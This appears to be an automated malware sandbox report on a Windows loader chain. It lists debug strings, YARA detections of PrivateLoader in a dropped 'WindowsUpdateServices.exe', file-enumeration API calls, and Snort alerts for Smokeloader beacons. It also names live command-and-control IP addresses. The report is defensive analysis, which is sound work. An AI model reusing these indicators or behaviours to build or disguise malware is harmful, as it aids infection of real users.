                        Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2398744659.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459639883.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403306598.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465418399.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403984086.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466348879.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401138877.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463261633.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399777885.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460682343.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400892291.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462814169.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: DE5A.exe, DE5A.exe, 00000016.00000002.2471761427.00007FFDFF2C4000.00000040.00000001.01000000.0000001B.sdmp, DE5A.exe, 0000002E.00000002.2594679915.00007FFE00524000.00000040.00000001.01000000.0000002B.sdmp
                        Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402315166.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464926673.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403783191.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466040313.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: DE5A.exe, 00000016.00000002.2474470989.00007FFE115A1000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402440948.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465108618.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400126816.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461133186.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403595756.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465829275.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: DE5A.exe, 00000016.00000002.2469647177.00007FFDFB279000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: DE5A.exe, 00000015.00000003.2397605685.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2479674945.00007FFE1A533000.00000002.00000001.01000000.00000010.sdmp, DE5A.exe, 00000027.00000003.2457880872.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2595982386.00007FFE11573000.00000002.00000001.01000000.00000020.sdmp
                        Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401603005.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464007360.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399657698.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460572839.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401138877.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463261633.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403192503.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465288220.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399541989.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460460068.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400503433.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461614650.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399105753.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460002090.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: DE5A.exe, 00000016.00000002.2474040580.00007FFE11581000.00000040.00000001.01000000.0000001C.sdmp, DE5A.exe, 0000002E.00000002.2596230418.00007FFE11581000.00000040.00000001.01000000.0000002C.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399228016.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460126912.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401237563.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463409848.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403306598.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465418399.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401906192.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464449776.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401603005.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464007360.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2398865544.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459784606.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: DE5A.exe, 00000016.00000002.2477389116.00007FFE1A49E000.00000040.00000001.01000000.00000014.sdmp
                        Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399105753.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460002090.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ucrtbase.pdbUGP source: DE5A.exe, 00000016.00000002.2473628005.00007FFE00521000.00000002.00000001.01000000.0000000E.sdmp, DE5A.exe, 0000002E.00000002.2593349908.00007FFDFF1F1000.00000002.00000001.01000000.0000001E.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: DE5A.exe, 00000016.00000002.2474846626.00007FFE11BB1000.00000040.00000001.01000000.00000017.sdmp
                        Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403595756.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465829275.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401906192.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464449776.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: DE5A.exe, 00000016.00000002.2469647177.00007FFDFB311000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: DE5A.exe, 00000016.00000002.2471761427.00007FFDFF2C4000.00000040.00000001.01000000.0000001B.sdmp, DE5A.exe, 0000002E.00000002.2594679915.00007FFE00524000.00000040.00000001.01000000.0000002B.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399325096.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460226793.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400772483.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462415733.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2398865544.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459784606.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401722785.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464273860.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403192503.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465288220.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: DE5A.exe, DE5A.exe, 00000016.00000002.2469647177.00007FFDFB311000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399777885.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460682343.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402440948.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465108618.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403984086.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466348879.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401474807.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463811905.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401013743.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462996367.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: DE5A.exe, 00000015.00000003.2399448628.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460344804.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: DE5A.exe
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: DE5A.exe, 00000016.00000002.2477766609.00007FFE1A4CC000.00000040.00000001.01000000.00000013.sdmp, DE5A.exe, 0000002E.00000002.2599019605.00007FFE1A52C000.00000040.00000001.01000000.00000023.sdmp
                        Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399908877.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460830926.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: DE5A.exe, 00000016.00000002.2475545585.00007FFE1A451000.00000040.00000001.01000000.0000001D.sdmp, DE5A.exe, 0000002E.00000002.2597768086.00007FFE1A451000.00000040.00000001.01000000.0000002D.sdmp
                        Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400256199.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461293936.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403438900.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465611078.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: DE5A.exe, 00000015.00000003.2400644859.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461857558.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: DE5A.exe, 00000016.00000002.2475199806.00007FFE11BD1000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401722785.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464273860.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp

                        Spreading

                        barindex
                        Yara detected PrivateLoader
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000003D.00000000.2500162285.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000000.2533489068.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2546695187.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2538043211.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2495171507.000001E8E7A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_00406739 FindFirstFileW,FindClose,0_2_00406739
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AED
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_009FE472
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_009FDC54
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A0A087
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A0A1E2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00A0A570
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A066DC FindFirstFileW,FindNextFileW,FindClose,10_2_00A066DC
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009CC622 FindFirstFileExW,10_2_009CC622
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00A073D4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A07333 FindFirstFileW,FindClose,10_2_00A07333
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_009FD921
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A0A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A0A087
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A0A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A0A1E2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_009FE472
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A0A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00A0A570
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A066DC FindFirstFileW,FindNextFileW,FindClose,13_2_00A066DC
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009CC622 FindFirstFileExW,13_2_009CC622
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00A073D4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A07333 FindFirstFileW,FindClose,13_2_00A07333
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_009FD921
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_009FDC54
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_001BA087
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_001BA1E2
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,20_2_001AE472
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,20_2_001BA570
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001B66DC FindFirstFileW,FindNextFileW,FindClose,20_2_001B66DC
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001B7333 FindFirstFileW,FindClose,20_2_001B7333
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,20_2_001B73D4
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_001AD921
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_001ADC54
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99C8D00 FindFirstFileExW,FindClose,21_2_00007FF6C99C8D00
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,21_2_00007FF6C99D8670
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99E26C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00007FF6C99E26C4
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,21_2_00007FF6C99D8670
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49739 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49740 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49741 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49742 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49744 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49745 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49747 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49749 -> 179.159.229.64:80
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\explorer.exeNetwork Connect: 65.108.69.93 443Jump to behavior
                        Source: C:\Windows\explorer.exeNetwork Connect: 179.159.229.64 80Jump to behavior
                        Yara detected PrivateLoader
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
